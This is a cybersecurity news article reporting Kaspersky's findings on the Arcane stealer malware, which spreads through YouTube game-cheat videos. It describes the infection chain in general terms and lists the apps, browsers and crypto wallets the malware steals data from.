Malicious actors are leveraging YouTube videos that promote game cheats to distribute a newly discovered stealer malware known as Arcane, which appears to primarily target users who speak Russian.
According to Kaspersky, the malware’s ability to collect a wide range of data is notable. The cybersecurity firm observed that Arcane can obtain account information from various VPN and gaming clients, as well as network utilities like ngrok, Playit, Cyberduck, FileZilla, and DynDNS.
The attack vectors involve sharing links to password-protected archives on YouTube videos. When accessed, these archives unpack a start.bat batch file, which retrieves another archive file via PowerShell.
The batch file then utilizes PowerShell to launch two executables embedded within the newly downloaded archive. Additionally, it disables Windows SmartScreen protections and adds exceptions to the SmartScreen filter for every drive root folder.
Of the two binaries, one is a cryptocurrency miner, and the other is a stealer known as VGS, which is a variant of the Phemedrone Stealer malware. Notably, the attacks have been found to replace VGS with Arcane as of November 2024.
Kaspersky noted that although much of Arcane’s code was borrowed from other stealers, it could not be attributed to any known malware families.
Arcane is capable of stealing login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers. Furthermore, it can harvest comprehensive system data, configuration files, settings, and account information from several apps, including:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, and ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, and DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, and Viber
- Email clients: Microsoft Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, and various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, and Coinomi
Arcane is also designed to take screenshots of the infected device, enumerate running processes, and list saved Wi-Fi networks and their passwords.
According to Kaspersky, most browsers generate unique keys for encrypting sensitive data, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers.
Source Link
